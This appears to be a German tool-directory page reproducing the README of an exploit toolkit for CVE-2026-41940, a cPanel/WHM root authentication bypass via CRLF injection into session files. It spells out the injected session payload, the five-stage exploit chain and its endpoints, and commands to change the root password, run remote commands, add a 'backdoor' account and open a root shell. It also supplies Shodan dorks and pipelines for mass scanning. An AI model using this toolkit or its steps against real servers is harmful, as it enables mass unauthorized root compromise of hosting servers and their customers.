Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Automated-scanner-CVE-2026-41940 — Automatisierter Scanner & Post-Exploitation-Toolkit für CVE-2026-41940 — cPanel & WHM Root-Authentifizierungs-Bypass via CRLF-Injection in Session-Dateien | Kitploit
Tools/GitHubGitHub/sardine-web/automated-scanner-cve-2026-41940
Authentifizierung & AutorisierungAufklärungSchwachstellenscannerExploitationWebanwendungs-ExploitationInformationsbeschaffungPost-ExploitationPenetrationstestsCommand and Control

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Red Teaming
Payload-Entwicklung
GitHubsardine-web/automated-scanner-cve-2026-41940

Automated-scanner-CVE-2026-41940

Automatisierter Scanner & Post-Exploitation-Toolkit für CVE-2026-41940 — cPanel & WHM Root-Authentifizierungs-Bypass via CRLF-Injection in Session-Dateien

Repository anzeigen
16vor 3 MonatenNoch nicht geprüft
Teilen

CPANEL CVE EXPLOIT

Englisch | فارسی (Persisch)

root@kitploit:~
 ██████╗██████╗  █████╗ ███╗   ██╗███████╗██╗
██╔════╝██╔══██╗██╔══██╗████╗  ██║██╔════╝██║
██║     ██████╔╝███████║██╔██╗ ██║█████╗  ██║
██║     ██╔═══╝ ██╔══██║██║╚██╗██║██╔══╝  ██║
╚██████╗██║     ██║  ██║██║ ╚████║███████╗███████╗
 ╚═════╝╚═╝     ╚═╝  ╚═╝╚═╝  ╚═══╝╚══════╝╚══════╝

 ██████╗██╗   ██╗███████╗
██╔════╝██║   ██║██╔════╝
██║     ██║   ██║█████╗
██║     ╚██╗ ██╔╝██╔══╝
╚██████╗ ╚████╔╝ ███████╗
 ╚═════╝  ╚═══╝  ╚══════╝

███████╗██╗  ██╗██████╗ ██╗      ██████╗ ██╗████████╗
██╔════╝╚██╗██╔╝██╔══██╗██║     ██╔═══██╗██║╚══██╔══╝
█████╗   ╚███╔╝ ██████╔╝██║     ██║   ██║██║   ██║
██╔══╝   ██╔██╗ ██╔═══╝ ██║     ██║   ██║██║   ██║
███████╗██╔╝ ██╗██║     ███████╗╚██████╔╝██║   ██║
╚══════╝╚═╝  ╚═╝╚═╝     ╚══════╝ ╚═════╝ ╚═╝   ╚═╝

Python CVE CVSS License Stdlib

Automatisierter Scanner & Post-Exploitation-Toolkit für CVE-2026-41940 — cPanel- & WHM-Root-Authentifizierungs-Bypass durch CRLF-Injection in Sitzungsdateien.


Inhaltsverzeichnis

  • Übersicht
  • CVE-Details
  • Funktionsweise
  • Funktionen
  • Betroffene Versionen
  • Voraussetzungen
  • Installation
  • Schnellstart
  • Verwendung
  • Post-Exploit-Aktionen
  • Interaktive WHM-Shell
  • Massenscan & Pipeline-Integration
  • Shodan-Dorks
  • Ausgabeformat
  • Beispielsitzung
  • Rechtlicher Hinweis

Übersicht

CPANEL CVE EXPLOIT ist ein Python-Tool in einer einzigen Datei, das für autorisierte Sicherheitsüberprüfungen von cPanel- & WHM-Servern entwickelt wurde, die für CVE-2026-41940 anfällig sind.

Die Schwachstelle ermöglicht es einem nicht authentifizierten entfernten Angreifer, WHM-Sitzungsdateien durch CRLF-Injection im Authorization: Basic-Header zu manipulieren (zu vergiften), wodurch die Authentifizierung umgangen und WHM-Zugriff mit Root-Rechten ohne gültige Anmeldedaten erlangt wird.


CVE-Details

Grundursache

In anfälligen Versionen von cPanel & WHM ruft saveSession() in Session.pm filter_sessiondata() nach dem Schreiben der Sitzungsdatei auf die Festplatte auf. Ein Angreifer kann CRLF-Zeichen (\r\n) über den HTTP-Header Authorization: Basic injizieren, die direkt in die Sitzungsdatei auf der Festplatte geschrieben werden – und so die Bereinigung umgehen.

Injizierte Sitzungsfelder

Das Tool verwendet einen Base64-kodierten Payload, der wie folgt dekodiert wird:

root@kitploit:~
root:x
successful_internal_auth_with_timestamp=9999999999
user=root
tfa_verified=1
hasroot=1

Diese Felder simulieren eine vollständig authentifizierte WHM-Root-Sitzung, einschließlich 2FA-Umgehung (tfa_verified=1) und Root-Rechte-Flag (hasroot=1).

Fix

cPanel hat filter_sessiondata() so verschoben, dass es vor dem Schreibvorgang der Sitzung in Session.pm ausgeführt wird.


Funktionsweise

Die Exploit-Kette besteht aus 5 Phasen (Phase 0–4):

root@kitploit:~
flowchart TD
    A[Stage 0: Canonical Host Discovery] --> B[Stage 1: Mint Preauth Session]
    B --> C[Stage 2: CRLF Injection via Authorization Header]
    C --> D[Stage 3: Session Propagation via do_token_denied]
    D --> E[Stage 4: Verify Root Access via json-api/version]
    E --> F{Vulnerable?}
    F -->|Yes| G[Post-Exploit Actions / Interactive Shell]
    F -->|No| H[Skip Target]

    A -.- A1["GET /openid_connect/cpanelid → 307 redirect reveals real hostname"]
    B -.- B1["POST /login/?login_only=1 → whostmgrsession cookie"]
    C -.- C1["GET / + poisoned Basic auth → /cpsessXXXXXXXXXX token"]
    D -.- D1["GET /scripts2/listaccts → flush raw session to cache"]
    E -.- E1["GET /cpsessXXX/json-api/version → HTTP 200 + version JSON"]

Funktionen


Betroffene Versionen

Hinweis: Ziele mit gepatchten Builds werden beim Scannen automatisch markiert und übersprungen.


Voraussetzungen

Kern (erforderlich)

  • Python 3.8+
  • Keine externen Pakete – verwendet nur die Python-Standardbibliothek

Optional

PaketZweck
seleniumBrowser-Autologin (--selenium)
Chrome / FirefoxBrowser-Engine für Selenium
root@kitploit:~
pip install -r requirements.txt   # optional — selenium only

Installation

root@kitploit:~
git clone https://github.com/YOUR_USERNAME/cpanel-cve-exploit.git
cd cpanel-cve-exploit

Kein Build-Schritt erforderlich. Direkt ausführen:

root@kitploit:~
python3 test-cve.py --help

Schnellstart

root@kitploit:~
# Scan a single WHM target
python3 test-cve.py -u https://target.com:2087

# Scan with post-exploit: list all cPanel accounts
python3 test-cve.py -u https://target.com:2087 --action list

# Mass scan from file, 20 threads, save JSON report
python3 test-cve.py -l targets.txt -t 20 -o results.json

Verwendung

root@kitploit:~
usage: test-cve.py [-h] [-u URL] [-l LIST] [--hostname HOSTNAME]
                   [-t THREADS] [--timeout TIMEOUT] [--rate-limit RATE_LIMIT]
                   [--action {list,passwd,cmd,exec,info,version,shell,adduser}]
                   [--passwd PASSWD] [--cmd CMD]
                   [--new-user NEW_USER] [--new-domain NEW_DOMAIN]
                   [--read-file READ_FILE] [--selenium]
                   [--engine {chrome,firefox}] [--browser] [--check-rce]
                   [-o OUTPUT] [--no-color]

Zieloptionen

FlagBeschreibung
-u, --url

Scan-Optionen

Ausgabeoptionen

FlagBeschreibung
-o, --outputErgebnisse in JSON-Datei speichern
--no-colorANSI-Farbausgabe deaktivieren

Post-Exploit-Aktionen

Post-Exploit-Flags funktionieren nur bei einzelnen Zielen (-u, nicht beim Massenscan).

Beispiele

root@kitploit:~
# Change root password after bypass
python3 test-cve.py -u https://target.com:2087 --action passwd --passwd 'P@ss2026!'

# Execute remote command
python3 test-cve.py -u https://target.com:2087 --action cmd --cmd "id;whoami;uname -a"

# Create backdoor cPanel account
python3 test-cve.py -u https://target.com:2087 \
  --action adduser --new-user backdoor --new-domain evil.com --passwd 'TempPass2026!'

# Open interactive WHM shell
python3 test-cve.py -u https://target.com:2087 --action shell

# Auto-login via Chrome
python3 test-cve.py -u https://target.com:2087 --selenium --engine chrome

# Manual browser login (prints JS for DevTools console)
python3 test-cve.py -u https://target.com:2087 --browser

Interaktive WHM-Shell

Mit --action shell starten für eine vollständige interaktive Sitzung:

root@kitploit:~
[email protected] ▶ help

  id / whoami / hostname / version  → server info
  ls [path]                         → file listing
  cat [path]                        → read file contents
  accounts                          → list cPanel accounts
  addadmin <user> <pass>            → create WHM admin/reseller
  passwd <newpass>                  → change root password
  exec <command>                    → run OS command
  exit / quit                       → exit shell

Beispiel:

root@kitploit:~
[email protected] ▶ id
  uid=0(root) gid=0(root) groups=0(root)

[email protected] ▶ accounts
  user=webuser1          domain=example.com          [email protected]
  user=webuser2          domain=test.com             [email protected]

[email protected] ▶ cat /etc/passwd

[email protected] ▶ exit

Massenscan & Pipeline-Integration

Aus Datei

root@kitploit:~
python3 test-cve.py -l targets.txt -t 20 -o results.json

Von stdin (Pipe)

root@kitploit:~
cat urls.txt | python3 test-cve.py

# subfinder + httpx pipeline
subfinder -d example.com -silent | httpx -p 2087 -silent | python3 test-cve.py -t 30

# Shodan pipeline
shodan search --fields ip_str,port 'title:"WHM Login"' | \
  awk '{print "https://"$1":"$2}' | python3 test-cve.py -t 30 -o shodan_results.json

Unterstützte Eingabeformate

FormatBeispiel
Vollständige URLhttps://192.168.1.1:2087
IP + Port192.168.1.1 2087
Shodan-AusgabeAutomatisch per Regex geparst
ANSI-gefärbte AusgabeAutomatisch entfernt

Shodan-Dorks

root@kitploit:~
title:"WHM Login"
title:"WebHost Manager" port:2087
product:"cPanel" port:2087
http.title:"WHM"
ssl:"cpanel" port:2087

Ausgabeformat

Ergebnisse werden als JSON gespeichert, wenn -o results.json verwendet wird:

root@kitploit:~
{
  "scanner": "cPanelSniper v2.0",
  "cve": "CVE-2026-41940",
  "timestamp": "2026-05-23T12:00:00.000000",
  "findings": [
    {
      "severity": "CRIT",
      "title": "CVE-2026-41940 — cPanel & WHM Authentication Bypass",
      "target": "https://target.com:2087",
      "canonical": "server.target.com",
      "session": "root:SessionName",
      "token": "/cpsess1234567890",
      "version": "11.126.0.50",
      "api_url": "https://target.com:2087/cpsess1234567890/json-api/version",
      "evidence": "{\"version\":\"11.126.0.50\"...}",
      "cve": "CVE-2026-41940",
      "cvss": "10.0",
      "timestamp": "2026-05-23T12:00:05.000000"
    }
  ]
}

Konsolenübersicht

root@kitploit:~
══════════════════════════════════════════════════════════════════════
  cPanelSniper — CVE-2026-41940 Scan Complete
  Time: 12.4s  ·  Targets: 50
──────────────────────────────────────────────────────────────────────

  ⚡ 2 VULNERABLE TARGET(S)

  Target   : https://victim1.com:2087
  Version  : 11.126.0.50
  Token    : /cpsess1234567890
  API URL  : https://victim1.com:2087/cpsess1234567890/json-api/version
  Evidence : {"version":"11.126.0.50"...}

══════════════════════════════════════════════════════════════════════

Beispielsitzung

root@kitploit:~
$ python3 test-cve.py -u https://target.com:2087

  Configuration:
   Targets  : 1
   Threads  : 10
   Timeout  : 15s
   Action   : scan only

12:00:01 [INFO] Canonical hostname discovered: server.target.com
12:00:02 [  OK] Stage1: preauth session = root:abc123...
12:00:03 [  OK] Stage2: HTTP 307 → token=/cpsess1234567890
12:00:04 [  OK] Stage3: HTTP 401 — do_token_denied gadget fired
12:00:05 [INFO] Stage4: HTTP 200  {"version":"11.126.0.50"...}
12:00:05 [PWND] CVE-2026-41940 CONFIRMED — WHM root access! (v11.126.0.50 — CONFIRMED vulnerable)
12:00:05 [PWND]   Token    : /cpsess1234567890
12:00:05 [PWND]   Session  : root:abc123...
12:00:05 [PWND]   Version  : 11.126.0.50
12:00:05 [PWND]   API URL  : https://target.com:2087/cpsess1234567890/json-api/version

Projektstruktur

root@kitploit:~
cpanel-cve-exploit/
├── test-cve.py        # Main scanner & exploit tool (single file)
├── requirements.txt   # Optional: selenium
├── README.md          # English documentation
└── README.fa.md       # Persian documentation (فارسی)

Rechtlicher Hinweis

NUR FÜR AUTORISIERTE SICHERHEITSTESTS

Dieses Tool wird ausschließlich für Bildungszwecke und autorisierte Penetrationstests bereitgestellt.

  • Verwenden Sie es nur gegen Systeme, die Sie besitzen oder für deren Tests Sie eine ausdrückliche schriftliche Genehmigung haben.
  • Unbefugter Zugriff auf Computersysteme ist rechtswidrig – unter anderem gemäß CFAA (USA), Computer Misuse Act (UK) und vergleichbaren Gesetzen weltweit.
  • Die Ausnutzung von CVE-2026-41940 in freier Wildbahn wurde bestätigt – patchen Sie betroffene Systeme sofort.
  • Die Autoren und Mitwirkenden übernehmen keine Haftung für den Missbrauch dieser Software.

Mit der Nutzung dieses Tools stimmen Sie zu, es verantwortungsbewusst und in Übereinstimmung mit allen geltenden Gesetzen zu verwenden.


Referenzen

  • CVE-2026-41940 — NVD-Eintrag
  • cPanel-Sicherheitshinweis — Session.pm-CRLF-Injection-Patch
  • WHM-Standardport: 2087 (HTTPS)

Für Sicherheitsforscher entwickelt · Verantwortungsvoll nutzen

Tool herunterladen
EigenschaftWert
CVECVE-2026-41940
SchweregradKritisch
CVSS10.0
AngriffsvektorNetzwerk / Nicht authentifiziert
AuswirkungVoller WHM-Root-Zugriff
Standardport2087 (WHM)
StatusAusnutzung in freier Wildbahn bestätigt (Apr. 2026)
PhaseEndpunktZweck
0/openid_connect/cpanelidKanonischen Hostnamen per 307-Weiterleitung automatisch ermitteln
1/login/?login_only=1Preauth-whostmgrsession-Cookie mit falschen Anmeldedaten abrufen
2/CRLF-vergifteten Authorization: Basic-Header in die Sitzungsdatei injizieren
3/scripts2/listacctsdo_token_denied-Gadget auslösen, um die Sitzung in den Cache zu schreiben
4/{token}/json-api/versionRoot-Zugriff bestätigen — HTTP 200 mit Versions-JSON
FunktionBeschreibung
Einzelziel-ScanVollständige Exploit-Kette gegen eine WHM-URL
MassenscanMultithread-Scan aus Datei oder stdin
VersionserkennungAutomatischer Vergleich gepatchter/anfälliger Versionen
Post-Exploit-APIPasswortänderung, Befehlsausführung, Kontoliste, Benutzererstellung
Interaktive ShellIntegrierte WHM-Root-Shell mit Dateilesen & API-Befehlen
Selenium-LoginSitzungscookie automatisch in Chrome/Firefox injizieren
Manueller Browser-FallbackJavaScript-Consolen-Snippets für manuelles WHM-Login
RCE-PrüfungSchnelle id / uname -a-Überprüfung nach dem Bypass
JSON-ExportAlle Ergebnisse in einem strukturierten JSON-Bericht speichern
Pipeline-tauglichFunktioniert mit httpx-, subfinder-, shodan- und awk-Pipelines
Nur StdlibKeine pip-Abhängigkeiten für die Kernfunktionen erforderlich
Farbige AusgabeEchtzeit-Phasenprotokollierung mit Schweregrad-Indikatoren
ZweigPatch abStatus
11.110.x11.110.0.97Vor Patch anfällig
11.118.x11.118.0.63Vor Patch anfällig
11.126.x11.126.0.54Vor Patch anfällig
11.132.x11.132.0.29Vor Patch anfällig
11.134.x11.134.0.20Vor Patch anfällig
11.136.x11.136.0.5Vor Patch anfällig
Einzelziel-URL (z. B. https://host:2087)
-l, --listDatei mit URLs, eine pro Zeile
--hostnameKanonischen Host-Header überschreiben (standardmäßig automatisch ermittelt)
FlagStandardBeschreibung
-t, --threads10Anzahl gleichzeitiger Scan-Threads
--timeout15HTTP-Timeout in Sekunden
--rate-limit0Verzögerung (Sekunden) zwischen Zielübermittlungen
AktionFlagBeschreibung
Nur scannen(Standard)Exploit-Kette ausführen und Schwachstelle melden
Konten auflisten--action listAlle cPanel-Konten über die WHM-API auflisten
Passwort ändern--action passwd --passwd <pass>WHM-Root-Passwort ändern
Befehl ausführen--action cmd --cmd "id;whoami"OS-Befehl über die WHM-Exec-API ausführen
Serverinfo--action infoHostname, Auslastung, Festplatte, Version abrufen
Version abrufen--action versioncPanel/WHM-Version über die API abrufen
Konto erstellen--action adduser --new-user u --new-domain d.com --passwd pNeues cPanel-Konto erstellen
Interaktive Shell--action shellInteraktive WHM-Root-Shell starten
RCE-Prüfung--check-rceid;uname -a nach erfolgreichem Bypass ausführen
Selenium-Login--selenium [--engine chrome|firefox]Automatisch im Browser beim WHM-Dashboard anmelden
Manueller Browser--browserJavaScript-Consolen-Befehle für manuelles Login ausgeben